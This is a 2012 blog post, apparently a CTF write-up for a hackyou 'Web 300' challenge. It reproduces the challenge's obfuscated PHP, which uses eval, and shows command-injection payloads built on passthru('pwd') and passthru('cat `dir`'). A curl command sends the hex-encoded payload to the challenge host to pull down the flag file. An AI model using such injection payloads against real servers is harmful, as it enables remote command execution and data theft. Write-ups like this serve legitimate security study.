Wednesday, October 17, 2012

hackyou CTF: Web 300

I'm very confident that I did not solve this in the manner I was supposed to do. Because I did not solve it how it was intended, I believe I made it more complicated than necessary, but in the end I believe it was a very cool solution.

The website is a random number generator and from reading the source code we know two things: they give you some nasty, nasty source code for the site and we want to access flag.txt.gz but can't. The source is posted below.
<?${b("ee3ab0f9421ce0feabb4676542993ab3")}=b("9a8890a6434cd24e876d687bcaf63b40218f525c");${b("a7d2546914126ca18ca52e3205950070")}=b("c74b0811f86043e9aba0c1d249633993");${b("116fe81df7d030c1e875745f97f9f138")}=b("6da187003b534e740a777e");${b("a3bfe0d3698e1310cce7588fbab15dbe")}=b("f19e6937d9080f346a01");${b("39ebc7035a36015274fdb7bf7c1b661e")}=b("336f2f8b0f837cf318");${b("66711d77210b4193e5539696d4337127")}=b("283101ccbc823b56");${b("d1cb34796276edb85d038ee75671cf4b")}(b("82c84c7312d7a17c4df032fc53b96a6eadeacc6624ca8d4763c855a11cb92226a8e3930f10fbef132e844b9062f07676a5b8a02569d68a552ef107d87ff4636ea5a6a10e4d83975a7add578362f07676a5b8ff610ed6d91c66c10ac82894083ae0ba90044a8fdb3e04844b8c36a56a29fed29a0e0ebb8a407a8438c975ec707fe0d4bc2c0e9f8b137acc0e8c41f67076a4badd031dc8e8392e844b8c2ab82f37e0e593050982c54761d108c436ed6a73b3bcd2035a829509218b18c975ec707fb2e89545439f96476bd612c363b7706fefe09e0a49d8914b7a8a0cd636b42f24cd8cd24b0ed6d91223894bcf77f7226eaff391030e828d5a7d9e4bc462ed7220efa9810e4d8397567cca0c827bf0716ea5f48b045bd8974621cd05c873e12c6aa8f6dc1f5682c51e239a66a636b9223afce09d1943d688567acc04c82bbe525593d2d55523fcc5132e844b8c53f7767fb2a686034bd696566bc0188c70f6703ab2e79c0f419bc55d7bc909c964b9657faee3800a5a9f8a5d228404c273b96063e0ea9b054bccd943219a66a636b9223ae0a6ce1f4b8e91527cc10a8c78f86f7ffda1800549a996566bc0188b36fa6d76b3bbc75b0e848a447d995a9c28"));if(${b("6c74ed82b97f6c415a83aa0aa8baf8d1")}(b("3d7e368111b63c72515d5d46b1"),${b("eb717d90b3287b1fbd")})){${b("532194e0380d7a29761eb0b215b4168d")}=${b("cb3911f75937342f3b")}[b("2daec48e9ce64f696075279dff")];${b("f877261be92e25500a601f21ab4cfa84")}=${b("507c24291c22ba245b")}[b("398058b936ce0090a90f349a298ae06b96")];${b("dbcffbbeb2632a6e6c6f84ac52064768")}=b("ac51a58253c0a511c9dc9cafd2490c5bd490ccb550c6a111c9de9aacd7480f5fd595cbb952c0a61bc9de9cadd3430857d792ccb553c1a61bcbd89aa8d2490e5ed493ceb254cba11dcedc9dabd5420d5ed793ccb554cba51cc8d59aaed2490e5ad599ceb154cba419c9d49da6d2480856d298cbb854caa110cfd49da7d2480856");if(${b("2e272b48041e04ef643cc8624445f2a0")}!=${b("6a24556aba8e247fa9d27de3bed53586")})${b("baee65eb837f2005a229dc821e06b2d9")}(b("d226cbb39ee6930cbddd02ea8b7a2913b7d8a98b9df6850ce79803"));else${b("966fd744cb7b26253a2d2e10d4f86ceb")}(${b("ee2d11ebf1e0953de1b3cd330bf63b45")}(b("ef1a9b31679b8ed9faa81647e89a674234"),${b("6e9dca05952d2364621f20fd1177a04c")}(b("99b85fb97c17"),${b("b9c7fb42fb9760cf9f90bdc23dcac2e6")}),${b("532194e0380d7a29761eb0b215b4168d")}));}else{foreach(${b("ff38daff4156b41b58d2ecfb70e4bc6b")}(b("cd248b6cb8"),b("94a8be1778"))as$_)${b("c30cddb21a8c75cc8e45d9fc34655c09")}(${b("9946a48e60730e4ca59fc82e0562fca1")}().b("f975de3ba2"));}${b("88a0090aa5d28c97de682ff340fc340b")}(b("3812ce7d43f003a4010d64890674a759b78a30aa75ff57e1595925c70a7be910b3857ade0fba4ae61110619f067bbe45a9c463c242f805af1e266497047aeb0cb3cd63805fa916ad0c1c38dc5626af5df3943d964de741f54d4830cf5520ab5df3963b9548e642f14c4d37c35726ac57f3963d944ced45f94e4a30cf5627ac57f1903b914de743f04d4b32c8512dab51f4943c924aec40f04e4b30cf512daf50f29d3b974de743f44c4132cb512dae55f39c3c9f4de645f84b4037c2512cab5cf59c3c9e4de645f85e592ac56e1fb945e7852e8743b619b10c0d258f1a65fc58e0d67bc512b603e6590f64971670a44280c060c20dbe03a4595f779a1260f65ee085219972d557e1595939d4057aeb08f9a8048743f015ae1d003bf66929b60db3c86299"));function b($b){return eval(Ü瑈©²ÓÒœÄ ¬žó¶é²îŒ–‰…ú í©¦Î²Œ×ª±§èù伦¡®Óð¿¿àšÒ ڊоßÁÜ•ï͵þë™Ä–þ¶±¤³ŒÀåòÈàÙ¡‰¿¸–¦õðö̼Š‰ßº‘ìØÚåàÇЁÑ‘ÊÛ‰âä þŠéÁÔÛ’ÈÕÑ Ï„ªüä±µÑÛÏÉ^®‚åýÛÜó¡è¶ÿÞûƒÓˆÆÆáò¼­‰ÕÚÒ¼š´îûšŸÁՐÎÓć­°•ÖÓȲ¡Ô¨æµÐ÷å¾¼ÂõœÑÚ¯í¿ ÆÐþÏ›®œÆð¼¡Ü؍úÊÚåÒ‡ØÒ®² ö);} ?>
I had NO clue how to decode this source code or even how it runs on the server (please comment if you know how). What I did see, however, was a POST parameter called rng_algorithm=a long string of numbers. This, when decoded to ASCII, yielded "ShA1(dATe(CRyPT(CRC32(sTRReV(ABs($1%SqrT(eXP(EXp(pI())))))))))." WE CAN CHANGE THE ALGORITHM!!! HOORAY!

Wuut? Hacker detected!



The website returned this at one point, so we can kind of change the algorithm. But what can we change it to? After much manual fuzzing of this algorithm, I determined that the algorithm must begin with "ShA1(dATe(" (camelcase matters), it must have the same length, and it must only contain letters that can be represented in hex with decimal numbers only (0x0a would not work but 0x09 would). This unfortunately eliminates so many useful characters that I spent the next few hours trying to craft an algorithm that would actually work and get me somewhere. At some point, I was eventually able to run the following algorithm.
ShA1(dATe($0))&(@passthru('pwd')%'11111111111111111111111111')
This returned my current working directory! We are getting somewhere! After about another 30 minutes of trying to figure out how to read the file, I ran the following algorithm.
ShA1(dATe($0))&(@passthru('cat `dir`')%'11111111111111111111')
This was a bad way to try get a gz file though (copy and paste is unreliable at best) so I decided to run it through curl and output it to a file.
curl --data "rng_seeds=280527088%0D%0A1067734584%0D%0A2024574801%0D%0A11326050%0D%0A1199766137%0D%0A&rng_algorithm=5368413128644154652824302929262840706173737468727528276361742060646972602729252731313131313131313131313131313131313131312729" http://securerng.misteryou.ru/ > flag.txt.gz
This did present some issues with there being extra data because of the other files in the directory, but it wasn't difficult to find the start and end of files with a little magic header research. I gunzipped the file only to find a ridiculously long base64 encoded string which, of course, was base64 encoded 42 times (I found that number with a variant of the below script). The script below decoded the flag and got the answer "flag: 36e03906042b7b266afa32bd1ea35445".
import base64

text = open('response.txt', 'r').read()
for i in range(42):
        text = base64.b64decode(text)

print text
So. In summary, I made this much more difficult than I think it was supposed to be, but I think it was a cool solution regardless.

-- suntzu_II

1 comment:

  1. Hi, suntzu_II!
    http://h34dump.com/?p=346 - write-up on the task including code deobfuscation and script allowing to execute any command on the server side.

    ReplyDelete